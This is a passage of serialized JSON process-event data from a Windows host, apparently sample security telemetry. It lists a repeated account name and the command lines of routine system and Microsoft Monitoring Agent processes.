in1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"NaN\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"NaN\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"NaN\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"NaN\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"NaN\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"NaN\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"NaN\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\"],\"CommandLine\":[\"nan\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\\\" -Embedding\",\"\\\"C:\\\\Windows\\\\system32\\\\unlodctr.exe\\\" \\\"cps etw data source\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\csc.exe\\\" /noconfig /fullpaths @\\\"C:\\\\Windows\\\\TEMP\\\\y2cnqfwv\\\\y2cnqfwv.cmdline\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 \\\"/OUT:C:\\\\Windows\\\\TEMP\\\\RES11C7.tmp\\\" \\\"c:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\889\\\\CSC59E7803C44264BB494469645A4F791C0.TMP\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\lodctr.exe\\\" \\\"C:\\\\Windows\\\\TEMP\\\\tmp110B.tmp\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c rmdir /s /q C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\WER\\\\ReportQueue\\\\\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c WerFault.exe -k -q\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"WerFault.exe  -k -q\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"ChangeEventModuleBatchSize.vbs\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"ChangeEventModuleBatchSize.vbs\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\WindowsOSBinaries\\\\MOF\\\\MOFWriter.exe\\\"  -baseline \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\922\\\\BaselineWindowsServer2016.xml\\\" -out \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\410045\\\\BaselineRulesetAll.mof\\\" -err \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\410045\\\\xmlToMoferrors.txt\\\" \",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\WindowsOSBinaries\\\\DSC\\\\ASMHost.exe\\\" Get \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\410045\\\\BaselineRulesetAll.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\410045\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\system32\\\\secedit.exe /export /cfg \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\WindowsOSBinaries\\\\Configuration\\\\AzureSecurityPack\\\\secedit.inf\\\"\",\"C:\\\\Windows\\\\system32\\\\secedit.exe /export /mergedpolicy /cfg \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3490\\\\WindowsOSBinaries\\\\Configuration\\\\AzureSecurityPack\\\\secedit.inf\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3473\\\\WebBinaries\\\\Microsoft.Sirona.OMS.Security.BaselineAssessment.exe\\\" -execPackage \\\"ANYPATH\\\" -w \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Monitoring Host Temporary Files 60\\\\3473\\\\410045\\\" -trace Off -smtrace Warning -discoverysettings Server:ServerName=MSTICAlertsWin1 -managementgroupid  -managementgroupname \\\"\\\" -assessmentId a1d21da7-586b-4b73-95cb-2405d2a54f5f -computername MSTICAlertsWin1 -assessmentname Web -headers False -maxdcs 300 -baselinerulesfilepath \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\916\\\\WebBaselineRules.xml\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\Resources\\\\884\\\\pmfexe.exe\\\" -PerfMode optimize -quickscan -event -json -alldetectors\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 